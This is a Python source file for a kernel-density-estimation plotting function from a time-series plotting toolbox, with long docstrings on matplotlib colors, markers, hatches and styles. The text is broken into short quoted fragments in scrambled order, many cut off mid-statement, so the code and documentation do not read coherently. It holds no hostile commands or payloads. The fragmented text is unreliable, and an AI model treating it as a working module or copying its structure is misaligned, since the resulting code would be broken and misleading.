linestyles = [\"", "take from the color pallette in the current plot style.", "legend=legend, legend_names=legend_names, subplots=subplots, sharex=sharex, sharey=sharey, colors=colors, linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style,", "legend. legend_names : str [optional, defaults to None] Legend would", "entire plot. hlines_colors: [optional, defaults to None] List of colors", "The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and * --lognorm_yaxis options", "plot type is 'scatter_matrix', this specifies the plot along the", "== \"auto\": linestyles = plotutils.LINE_LIST else: linestyles = tsutils.make_list(linestyles) if", "next(imarkerstyles) else: m = None if ilinestyles is not None:", "'auto'] If 'auto' will iterate through the available matplotlib line", "1], # grid=[bool, [\"domain\", [True, False]], 1], # label_rotation=[float, [\"pass\",", "of gray, where 0 is white an 1 is black.", "called kernel density estimation (KDE). {ydata} Parameters ---------- {input_ts} ofilename", "lower and upper limits for the y-axis of the plot.", "plt.xlabel(xtitle) plt.ylabel(ytitle) if invert_xaxis is True: plt.gca().invert_xaxis() if invert_yaxis is", "* For --lognorm_xaxis use --type=\"lognorm_xaxis\" * For --lognorm_yaxis use --type=\"lognorm_yaxis\"", "numpy as np import pandas as pd from mando.rst_text_formatter import", "for major labels for bar plots. drawstyle : str [optional,", "if ``type`` \"lag_plot\" is chosen. xtitle : str [optional, default", "| crossed diagonal | +-----------------+-------------------+ | o | small circle", "vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot data.\"\"\" #", "+-----------------+-------------------+ | ``\\`` | back diagonal | +-----------------+-------------------+ | ``|``", "[optional] Rotation for major labels for bar plots. label_skip :", "from beginning and end. {force_freq} invert_xaxis [optional, default is False]", "ylim=ylim, secondary_y=secondary_y, mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis,", "kde( input_ts=input_ts, columns=columns, start_date=start_date, end_date=end_date, clean=clean, skiprows=skiprows, index_type=index_type, names=names, ofilename=ofilename,", "lines. If a list must be same length as `hlines_y`.", "''] Title of chart. figsize : str [optional, defaults to", "True or norm_yaxis is True or lognorm_xaxis is True or", "through the available matplotlib marker types. Otherwise on the command", "plotutils.MARKER_LIST: markerstyles.append(st[1]) try: linestyles.append(st[2:]) except IndexError: linestyles.append(\" \") else: markerstyles.append(\"", "\"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\", \"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\", \"seaborn-talk\",", "four different ways. 1. Use 'CN' where N is a", "'log'. secondary_y [optional, default is False] Whether to plot on", "!= \"auto\": nstyle = tsutils.make_list(style) if len(nstyle) != len(tsd.columns): raise", "is not None: plt.setp(line, color=c) plt.setp(line, marker=m) plt.setp(line, linestyle=l) ytitle", "RSTHelpFormatter from tstoolbox import tsutils from .. import plotutils warnings.filterwarnings(\"ignore\")", "as the minimum x values for all vertical lines. A", "manipulation of time series.\"\"\" from __future__ import absolute_import, division, print_function", "else i for i in linestyles] markerstyles = [\" \"", "triangle up | +-------+----------------+ | < | triangle left |", "xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\",", "the 'style' keyword. +---------+--------------+ | Code | Lines | +=========+==============+", "'style' keyword. +---------+--------------+ | Code | Lines | +=========+==============+ |", "with the implementation of # mando legend = bool(legend ==", "= ytitle or \"Density\" if legend is True: plt.legend(loc=\"best\") if", "+-------+----------------+ | 1 | tri_down | +-------+----------------+ | 2 |", "\"seaborn-dark\", # \"seaborn-dark-palette\", # \"seaborn-darkgrid\", # \"seaborn-deep\", # \"seaborn-muted\", #", "\"xy\", \"bar\", \"bar_stacked\", \"histogram\", \"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\",", "probability density function. \"kde\" will create a plot of estimation", "for the standard linestyles list. \"\"\" plt = kde( input_ts=input_ts,", "' ' | nothing | +-------+----------------+ | '' | nothing", "drawstyle=[str, [\"pass\", []], 1], # por=[bool, [\"domain\", [True, False]], 1],", "[\" \" if i is None else i for i", "target_units=target_units, clean=clean, por=por, ) tsd, lnames = plotutils.check(type, tsd, legend_names)", "where x == y. Set to a line style code.", "below. +------+---------+ | Code | Color | +======+=========+ | b", "# plot_styles=[ # str, # [ # \"domain\", # [", "This is to help pretty print the frequency try: try:", "\"bright\", \"vibrant\", \"muted\", and \"retro\". If multiple styles then each", "the color for all vertical lines. If a list must", "# sharex=[bool, [\"domain\", [True, False]], 1], # sharey=[bool, [\"domain\", [True,", "hlines_xmin=[float, [\"pass\", []], None], # hlines_xmax=[float, [\"pass\", []], None], #", "= ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin, hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles, ) if", "figsize=[float, [\"range\", [0, None]], 2], # legend=[bool, [\"domain\", [True, False]],", "+ plotutils.LINE_LIST], # None, # ], # ) def kde(", "\"Density\" if legend is True: plt.legend(loc=\"best\") if hlines_y is not", "\" \"] + plotutils.LINE_LIST], None], # markerstyles=[str, [\"domain\", [\"auto\", None,", "+-------+----------------+ | < | triangle left | +-------+----------------+ | >", "None] List of maximum x values to end each horizontal", "index_type=index_type, start_date=start_date, end_date=end_date, pick=columns, round_index=round_index, dropna=\"all\", source_units=source_units, target_units=target_units, clean=clean, por=por,", "major ticks. label_rotation : int [optional] Rotation for major labels", "all of the characteristics of the previous. Color Blind Appropriate", "pentagon | +-------+----------------+ | ``*`` | star | +-------+----------------+ |", "\"] + plotutils.HATCH_LIST], None], # style=[str, [\"pass\", []], None], #", "plot. bootstrap_samples [optional, defaults to 500] The number of random", "the linestyle code. Separated 'colors', 'linestyles', and 'markerstyles' instead of", "defaults to None] List of x values where to place", "be changed or added to as needed. lag_plot_lag [optional, default", "linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False, xaxis=\"arithmetic\", yaxis=\"arithmetic\", xlim=None,", "| +-----------------+-------------------+ | o | small circle | +-----------------+-------------------+ |", "is \"default\"] Set the style of the plot. One or", "of maximum x values to end each vertical line. If", "use --yaxis=\"log\" * For --norm_xaxis use --type=\"norm_xaxis\" * For --norm_yaxis", "colors in the chosen style. At the command line supply", "# figsize=[float, [\"range\", [0, None]], 2], # legend=[bool, [\"domain\", [True,", "be used as the color for all vertical lines. If", "use --xaxis=\"log\" * For --logy use --yaxis=\"log\" * For --norm_xaxis", "= tsutils.make_list(hlines_colors) hlines_linestyles = tsutils.make_list(hlines_linestyles) nxlim = ax.get_xlim() if hlines_xmin", "combine codes in 'ColorMarkerLine' order, for example 'r*--' is a", "por=por, ) tsd, lnames = plotutils.check(type, tsd, legend_names) # This", "\" if i is None else i for i in", "c = next(icolors) else: c = None if imarkerstyles is", "vlines_ymin is None: vlines_ymin = nylim[0] if vlines_ymax is None:", ": int [optional] Skip for major labels for bar plots.", "= [] linestyles = [] for st in nstyle: colors.append(st[0])", "x | x | +-------+----------------+ | D | diamond |", "0 is white an 1 is black. 4. Any of", "# [ # \"domain\", # [\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\",", "value to last good value. Strips NANs from beginning and", "is None] Still available, but if None is replaced by", "subplots [optional, defaults to False] Make separate subplots for each", "lognorm_yaxis, weibull_xaxis, and weibull_yaxis. prob_plot_sort_values : str [optional, default is", "y. Set to a line style code. grid [optional, default", "\"bright\", # \"vibrant\", # \"muted\", # \"retro\", # ], #", "for the entire plot. vlines_ymax: [optional, defaults to None] List", "grid=False, label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\",", "= plotutils.HATCH_LIST else: bar_hatchstyles = tsutils.make_list(bar_hatchstyles) if markerstyles == \"auto\":", "\"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\", and SciencePlots styles \"science\",", "linestyles.append(\" \") else: markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles is None:", "hatch types. Otherwise on the command line a comma separated", "# \"tableau-colorblind10\", # \"science\", # \"grid\", # \"ieee\", # \"scatter\",", "None else: colors = tsutils.make_list(colors) if linestyles == \"auto\": linestyles", "also will change the chart size to fit in a", "lines. If a single color then will be used as", "+======+=========+ | b | blue | +------+---------+ | g |", "\"\", \" \", \" \"] + plotutils.MARKER_LIST], None], # bar_hatchstyles=[str,", "O | large circle | +-----------------+-------------------+ | . | dots", "\"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\", and \"muted\" are all styles that", "hatching | +-----------------+-------------------+ | ``\\`` | back diagonal | +-----------------+-------------------+", "if pltfreq == \"none\": short_freq = \"\" else: # short", "\"vibrant\", and \"muted\" are all styles that are setup to", "= [] markerstyles = [] linestyles = [] for st", "weibull_yaxis. {columns} {start_date} {end_date} {clean} {skiprows} {index_type} {names} {source_units} {target_units}", "\"california\"], # ], # 1, # ], # prob_plot_sort_values=[str, [\"domain\",", "# xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # yaxis=[str, [\"domain\", [\"arithmetic\",", "+-------+----------------+ | ``*`` | star | +-------+----------------+ | h |", "crossed | +-----------------+-------------------+ | x | crossed diagonal | +-----------------+-------------------+", "plot in inches. legend [optional, defaults to True] Whether to", "will create a PNG file. If used within Python, and", "norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. prob_plot_sort_values : str [optional,", "vlines_x=[float, [\"pass\", []], None], # vlines_ymin=[float, [\"pass\", []], None], #", "code. grid [optional, default is False] Whether to plot grid", "absolute_import, division, print_function import itertools import os import warnings import", "| draw nothing | +---------+--------------+ | '' | draw nothing", "[ os.path.join(style_loc, i + \".mplstyle\") if os.path.exists(os.path.join(style_loc, i + \".mplstyle\"))", "vlines_x: [optional, defaults to None] List of x values where", "norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle,", "| triangle up | +-------+----------------+ | < | triangle left", "icolors = itertools.cycle(colors) else: icolors = None imarkerstyles = itertools.cycle(markerstyles)", "to True] Whether to display the legend. legend_names : str", "'--xlim 1,1000' would limit the plot from 1 to 1000,", "along the diagonal. One of 'kde' for Kernel Density Estimation", "[\"pass\", []], None], # vlines_ymax=[float, [\"pass\", []], None], # vlines_colors=[str,", "False] Invert the x-axis. invert_yaxis [optional, default is False] Invert", "None], # hlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\",", "for example 'filename.png' will create a PNG file. If used", "[optional, defaults to None] List of linestyles for the horizontal", "3. Number between 0 and 1 that represents the level", "nothing | +-------+----------------+ | ' ' | nothing | +-------+----------------+", "share y axis. colors [optional, default is 'auto'] The default", "yellow | +------+---------+ | k | black | +------+---------+ 3.", "1], # xy_match_line=[str, [\"pass\", []], 1], # grid=[bool, [\"domain\", [True,", "legend == \"True\" or legend is None) type = \"kde\"", "| red | +------+---------+ | c | cyan | +------+---------+", "+-----------------+-------------------+ | . | dots | +-----------------+-------------------+ | * |", "0 and 1 that represents the level of gray, where", "each vertical line. If a list must be same length", "--logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and * --lognorm_yaxis options are deprecated.", "for i in plot_styles ] plt.style.use(plot_styles) figsize = tsutils.make_list(figsize, n=2)", "| h | hexagon1 | +-------+----------------+ | H | hexagon2", "[optional, default is 'arithmetic'] Defines the type of the yaxis.", "for backward-compatibility. ACCEPTS:: ['default' | 'steps' | 'steps-pre' | 'steps-mid'", "# @tsutils.validator( # ofilename=[str, [\"pass\", []], 1], # type=[str, [\"domain\",", "vlines_x = ppf(tsutils.make_list(vlines_x)) plt.vlines( vlines_x, vlines_ymin, vlines_ymax, colors=vlines_colors, linestyles=vlines_linestyles, )", "# subplots=[bool, [\"domain\", [True, False]], 1], # sharex=[bool, [\"domain\", [True,", "fit in a column of the \"IEEE\" journal. The \"grayscale\"", "+ [\"no-latex\"] style_loc = os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles", "| +-------+----------------+ | x | x | +-------+----------------+ | D", "\"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\", \"seaborn-dark\", \"seaborn-dark-palette\", \"seaborn-darkgrid\", \"seaborn-deep\", \"seaborn-muted\",", "itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) # Only for bar, barh, bar_stacked,", "| c | cyan | +------+---------+ | m | magenta", "= tsutils.make_list(vlines_linestyles) nylim = ax.get_ylim() if vlines_ymin is None: vlines_ymin", "is False] Invert the y-axis. plotting_position : str [optional, default", "to end each horizontal line. If a list must be", "+------------------+ | HTML Color Names | +==================+ | red |", "strings if using the Python API. Separated 'colors', 'linestyles', and", "or lognorm_xaxis is True or lognorm_yaxis is True ): warnings.warn(", "``+`` | plus | +-------+----------------+ | x | x |", "of the plot. One or more of Matplotlib styles \"classic\",", "if st[1] in plotutils.MARKER_LIST: markerstyles.append(st[1]) try: linestyles.append(st[2:]) except IndexError: linestyles.append(\"", "2 | tri_up | +-------+----------------+ | 3 | tri_left |", "iterate through the available matplotlib marker types. Otherwise on the", "[optional, default is based on range of x values] Comma", "to None] List of x values where to place a", "with star marker. bar_hatchstyles [optional, default to \"auto\", only used", "# vlines_linestyles=[ # str, # [\"domain\", [\"auto\", None, \"\", \"", "`vlines_x`. If a single number will be the maximum x", "| +-------+----------------+ | 3 | tri_left | +-------+----------------+ | 4", "not None: l = next(ilinestyles) else: l = None if", "command line a comma separated list, or a list of", "prob_plot_sort_values=[str, [\"domain\", [\"ascending\", \"descending\"]], 1], # plot_styles=[ # str, #", "One of 'arithmetic', 'log'. yaxis : str [optional, default is", "sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\", logx=False, logy=False,", "can then be changed or added to as needed. lag_plot_lag", "xtitle : str [optional, default depends on ``type``] Title of", "list of strings for each time-series in the data set.", "of 'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED: use", "at the maximum x value for the entire plot. vlines_colors:", "None: c = next(icolors) else: c = None if imarkerstyles", "of plot in inches. legend [optional, defaults to True] Whether", "<filename>src/plottoolbox/functions/kde.py # -*- coding: utf-8 -*- \"\"\"Collection of functions for", "colors for the vertical lines. If a single color then", "+=======+================+ | . | point | +-------+----------------+ | o |", "grid [optional, default is False] Whether to plot grid lines", "'log'. yaxis : str [optional, default is 'arithmetic'] Defines the", "\"\"\" You have to have the same number of style", "``type``] Title of x-axis. ytitle : str [optional, default depends", "+-------+----------------+ | '' | nothing | +-------+----------------+ Marker reference: http://matplotlib.org/api/markers_api.html", "| +------------------+ Color reference: http://matplotlib.org/api/colors_api.html linestyles [optional, default to 'auto']", "the table below. +------+---------+ | Code | Color | +======+=========+", "\"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq = \"\" if colors == \"auto\":", "list of y values where to place a horizontal line.", "\"seaborn\", # \"seaborn-bright\", # \"seaborn-colorblind\", # \"seaborn-dark\", # \"seaborn-dark-palette\", #", "nothing | +-------+----------------+ | '' | nothing | +-------+----------------+ Marker", "diagonal | +-----------------+-------------------+ | ``|`` | vertical | +-----------------+-------------------+ |", "+---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional, default to ' ']", "and SciencePlots styles \"science\", \"grid\", \"ieee\", \"scatter\", \"notebook\", \"high-vis\", \"bright\",", "standard linestyles list. vlines_x: [optional, defaults to None] List of", "label_rotation=[float, [\"pass\", []], 1], # label_skip=[int, [\"range\", [1, None]], 1],", "| x | +-------+----------------+ | D | diamond | +-------+----------------+", "1], # label_rotation=[float, [\"pass\", []], 1], # label_skip=[int, [\"range\", [1,", "+------+---------+ | y | yellow | +------+---------+ | k |", "\"seaborn-pastel\", # \"seaborn-poster\", # \"seaborn-talk\", # \"seaborn-ticks\", # \"seaborn-white\", #", "[] for st in nstyle: colors.append(st[0]) if len(st) == 1:", "style strings, but you have {} time-series. \"\"\".format( style, len(nstyle),", "column of the \"IEEE\" journal. The \"grayscale\" is another style", "]: if hlines_y is not None: if type in [\"norm_yaxis\",", "vlines_linestyles=\"-\", ): r\"\"\"Kernel density estimation of probability density function. \"kde\"", "each time series. sharex [optional, default to True] In case", "\"auto\": colors = None else: colors = tsutils.make_list(colors) if linestyles", "style, len(nstyle), len(tsd.columns) ) ) ) colors = [] markerstyles", "'weibull'] {plotting_position_table} Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis,", "thin diamond | +-------+----------------+ | _ | hlines_y | +-------+----------------+", "Plot from first good value to last good value. Strips", "all vertical lines. A missing value or None will start", "\"seaborn-bright\", # \"seaborn-colorblind\", # \"seaborn-dark\", # \"seaborn-dark-palette\", # \"seaborn-darkgrid\", #", "i is None else i for i in markerstyles] if", "linestyles.append(st[2:]) except IndexError: linestyles.append(\" \") else: markerstyles.append(\" \") linestyles.append(st[1:]) if", "used as the color for all vertical lines. If a", "1 that represents the level of gray, where 0 is", "+-------+----------------+ | ``+`` | plus | +-------+----------------+ | x |", "= [\" \" if i is None else i for", "is 'arithmetic'] Defines the type of the xaxis. One of", "!= len(tsd.columns): raise ValueError( tsutils.error_wrapper( \"\"\" You have to have", "for the plot. Extension defines the type, for example 'filename.png'", "# \"seaborn-white\", # \"seaborn-whitegrid\", # \"tableau-colorblind10\", # \"science\", # \"grid\",", "strings, but you have {} time-series. \"\"\".format( style, len(nstyle), len(tsd.columns)", "| ``-`` | solid | +---------+--------------+ | -- | dashed", "be same length as `hlines_y`. If a single number will", "replaced by 'colors', 'linestyles', and 'markerstyles' options. Currently the 'style'", "distinguished by someone with color blindness. Black, White, and Gray", "as the minimum x values for all horizontal lines. A", "vertical lines. A missing value or None will end at", "= nxlim[0] if hlines_xmax is None: hlines_xmax = nxlim[1] if", "the plot. See `xlim` for examples. xaxis : str [optional,", "[optional, defaults is ''] Will add a match line where", "as plt from matplotlib.ticker import FixedLocator tsd = tsutils.common_kwds( input_ts,", "lines. If a single linestyle then will be used as", "colors.append(st[0]) if len(st) == 1: markerstyles.append(\" \") linestyles.append(\"-\") continue if", "\"grid\", \"ieee\", \"scatter\", \"notebook\", \"high-vis\", \"bright\", \"vibrant\", \"muted\", and \"retro\".", "will iterate through the available matplotlib marker types. Otherwise on", "mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid,", "| ``|`` | vertical | +-----------------+-------------------+ | - | horizontal", "estimation of probability density function. \"kde\" will create a plot", "comma separated list, or a list of strings if using", "to 1000, where '--xlim ,1000' would base the lower limit", "inches. legend [optional, defaults to True] Whether to display the", "\"seaborn-dark-palette\", # \"seaborn-darkgrid\", # \"seaborn-deep\", # \"seaborn-muted\", # \"seaborn-notebook\", #", "for all vertical lines. If a list must be same", "if invert_yaxis is True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename", "| +-----------------+-------------------+ | * | stars | +-----------------+-------------------+ logx DEPRECATED:", "time-series to plot on secondary y-axis. mark_right [optional, default is", "case subplots=True, share x axis. sharey [optional, default to False]", "as `vlines_x`. If a single number will be the maximum", "of random subsets of 'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"' instead.", "x-axis of the plot. For example, '--xlim 1,1000' would limit", "else: # short freq string (day) OR (2 day) short_freq", "step-plots. 'steps' is equivalent to 'steps-pre' and is maintained for", "1], # colors=[str, [\"pass\", []], None], # linestyles=[str, [\"domain\", [\"auto\",", "series. sharex [optional, default to True] In case subplots=True, share", "+-----------------+-------------------+ logx DEPRECATED: use '--xaxis=\"log\"' instead. logy DEPRECATED: use '--yaxis=\"log\"'", "itertools import os import warnings import mando import numpy as", "[]], 1], # title=[str, [\"pass\", []], 1], # figsize=[float, [\"range\",", "ax.get_ylim() if vlines_ymin is None: vlines_ymin = nylim[0] if vlines_ymax", "por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None, lag_plot_lag=1, plot_styles=\"bright\",", "True] When using a secondary_y axis, should the legend label", "day) short_freq = \"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq = \"\" if", "on the command line a comma separated list, or a", "[optional, defaults to 500] The number of random subsets of", "invert_yaxis=[bool, [\"domain\", [True, False]], 1], # plotting_position=[ # str, #", "# ], # None, # ], # hlines_y=[float, [\"pass\", []],", "\", \" \"] + plotutils.LINE_LIST], # None, # ], #", "style=[str, [\"pass\", []], None], # xlim=[float, [\"pass\", []], 2], #", "None: icolors = itertools.cycle(colors) else: icolors = None imarkerstyles =", "[]], 1], # ytitle=[str, [\"pass\", []], 1], # title=[str, [\"pass\",", "the values for the probability plots. Only used for norm_xaxis,", "\", \" \"] + plotutils.LINE_LIST], None], # markerstyles=[str, [\"domain\", [\"auto\",", "1], # label_skip=[int, [\"range\", [1, None]], 1], # drawstyle=[str, [\"pass\",", "False] Invert the y-axis. plotting_position : str [optional, default is", "c = None if imarkerstyles is not None: m =", "'scatter_matrix', this specifies the plot along the diagonal. One of", "else i for i in markerstyles] if colors is not", "for the vertical lines. If a single linestyle then will", "`hlines_y`. If a single number will be the maximum x", "be used as the color for all horizontal lines. If", "within Python, and `ofilename` is None will return the Matplotlib", "\"muted\" are all styles that are setup to be able", "nxlim = ax.get_xlim() if hlines_xmin is None: hlines_xmin = nxlim[0]", "if c is not None: plt.setp(line, color=c) plt.setp(line, marker=m) plt.setp(line,", ") # @tsutils.validator( # ofilename=[str, [\"pass\", []], 1], # type=[str,", "not None: if type in [\"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\"]: vlines_x =", "None] List of minimum y values to start the vertical", "target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin,", "Output filename for the plot. Extension defines the type, for", ") for index, line in enumerate(ax.lines): if icolors is not", "[\" \"] else: linestyles = [\" \" if i in", "--type=\"norm_yaxis\" * For --lognorm_xaxis use --type=\"lognorm_xaxis\" * For --lognorm_yaxis use", "`vlines_x`. If a single number will be used as the", "list/tuple, which time-series to plot on secondary y-axis. mark_right [optional,", "[\"domain\", [True, False]], 1], # mark_right=[bool, [\"domain\", [True, False]], 1],", "available, but if None is replaced by 'colors', 'linestyles', and", "figsize : str [optional, defaults to '10,6.5'] The 'width,height' of", "defaults to None] List of minimum x values to start", "| +-------+----------------+ | h | hexagon1 | +-------+----------------+ | H", "): warnings.warn( \"\"\" * * The --logx, --logy, --norm_xaxis, --norm_yaxis,", "DEPRECATED: use '--xaxis=\"log\"' instead. logy DEPRECATED: use '--yaxis=\"log\"' instead. xlim", "filename for the plot. Extension defines the type, for example", "on secondary y-axis. mark_right [optional, default is True] When using", "[\"pass\", []], 1], # grid=[bool, [\"domain\", [True, False]], 1], #", "Number between 0 and 1 that represents the level of", "1000, where '--xlim ,1000' would base the lower limit on", "data set. You must supply a comma separated list of", "Estimation or 'hist' for a histogram. bootstrap_size : int [optional,", "== \"auto\": markerstyles = plotutils.MARKER_LIST else: markerstyles = tsutils.make_list(markerstyles) if", "plotting_position : str [optional, default is 'weibull'] {plotting_position_table} Only used", "str, # [ # \"domain\", # [\"weibull\", \"benard\", \"tukey\", \"gumbel\",", "\"vibrant\", # \"muted\", # \"retro\", # ], # ], #", "list of strings if using the Python API. +-----------------+-------------------+ |", "or a list of strings if using the Python API.", "source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles, hlines_y=hlines_y, hlines_xmin=hlines_xmin, hlines_xmax=hlines_xmax, hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x,", "if os.path.exists(os.path.join(style_loc, i + \".mplstyle\")) else i for i in", "lag used if ``type`` \"lag_plot\" is chosen. xtitle : str", "default is True] When using a secondary_y axis, should the", "then will be used as the color for all horizontal", "or lognorm_yaxis is True ): warnings.warn( \"\"\" * * The", "a comma separated matplotlib color codes, or within Python a", "set. subplots [optional, defaults to False] Make separate subplots for", ": int [optional, defaults to 50] The size of the", "\"ieee\", \"scatter\", \"notebook\", \"high-vis\", \"bright\", \"vibrant\", \"muted\", and \"retro\". If", "is True or lognorm_yaxis is True ): warnings.warn( \"\"\" *", "pltfreq.split(\" \")[0][1:] == \"1\": beginstr = 3 else: beginstr =", "label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values,", "defaults with the implementation of # mando legend = bool(legend", "1], # legend_names=[str, [\"pass\", []], 1], # subplots=[bool, [\"domain\", [True,", "as `vlines_x`. If a single number will be used as", "List of maximum x values to end each horizontal line.", "the names in the data set. You must supply a", "[\"kde\",],], 1,], # lag_plot_lag=[int, [\"range\", [1, None]], 1], # xtitle=[str,", "# legend=[bool, [\"domain\", [True, False]], 1], # legend_names=[str, [\"pass\", []],", "[True, False]], 1], # sharey=[bool, [\"domain\", [True, False]], 1], #", "itertools.cycle(linestyles) # Only for bar, barh, bar_stacked, and barh_stacked. ibar_hatchstyles", "if len(nstyle) != len(tsd.columns): raise ValueError( tsutils.error_wrapper( \"\"\" You have", "where N is a number from 0 to 9 that", "if ( logx is True or logy is True or", "| x | x | +-------+----------------+ | D | diamond", "SciencePlots styles \"science\", \"grid\", \"ieee\", \"scatter\", \"notebook\", \"high-vis\", \"bright\", \"vibrant\",", "[\"domain\", [\"kde\", \"hist\"]], 1], # bootstrap_size=[int, [\"range\", [0, None]], 1],", "'linestyles', and 'markerstyles' instead of using the 'style' keyword. +---------+--------------+", "if icolors is not None: c = next(icolors) else: c", "style != \"auto\": nstyle = tsutils.make_list(style) if len(nstyle) != len(tsd.columns):", "style. hlines_linestyles: [optional, defaults to None] List of linestyles for", ": str [optional, defaults is ''] Will add a match", "used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis, weibull_xaxis, and weibull_yaxis. prob_plot_sort_values", "will iterate through the available matplotlib hatch types. Otherwise on", "DEPRECATED: use '--type=\"norm_xaxis\"' instead. norm_yaxis DEPRECATED: use '--type=\"norm_yaxis\"' instead. lognorm_xaxis", "True: plt.legend(loc=\"best\") if hlines_y is not None: hlines_y = tsutils.make_list(hlines_y)", "logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y, mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples,", "= None if ilinestyles is not None: l = next(ilinestyles)", "print the frequency try: try: pltfreq = str(tsd.index.freq, \"utf-8\").lower() except", "| thin diamond | +-------+----------------+ | _ | hlines_y |", "vlines_ymin=[float, [\"pass\", []], None], # vlines_ymax=[float, [\"pass\", []], None], #", "next(icolors) else: c = None if imarkerstyles is not None:", "| 1 | tri_down | +-------+----------------+ | 2 | tri_up", "from the color pallette in the current plot style. vlines_linestyles:", "plotutils.LINE_LIST else: linestyles = tsutils.make_list(linestyles) if bar_hatchstyles == \"auto\": bar_hatchstyles", "[] markerstyles = [] linestyles = [] for st in", "for the x-axis of the plot. For example, '--xlim 1,1000'", "\"histogram\", \"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\", ]: if hlines_y", "the standard linestyles list. \"\"\" plt = kde( input_ts=input_ts, columns=columns,", "1], # scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]], 1], # bootstrap_size=[int, [\"range\",", "draw nothing | +---------+--------------+ | '' | draw nothing |", "list of strings if using the Python API. To not", "/ | diagonal hatching | +-----------------+-------------------+ | ``\\`` | back", "markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles is None: linestyles = [\"", "lag_plot_lag=[int, [\"range\", [1, None]], 1], # xtitle=[str, [\"pass\", []], 1],", "== \"True\" or legend is None) type = \"kde\" import", "separated lower and upper limits for the x-axis of the", "used as the color for all horizontal lines. If a", "formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False,", "'linestyles', and 'markerstyles' instead of using the 'style' keyword. +-------+----------------+", "are all styles that are setup to be able to", "line style code. grid [optional, default is False] Whether to", "is based on range of y values] Comma separated lower", "if using the Python API. +-----------------+-------------------+ | bar_hatchstyles | Description", "the Python API. +-----------------+-------------------+ | bar_hatchstyles | Description | +=================+===================+", 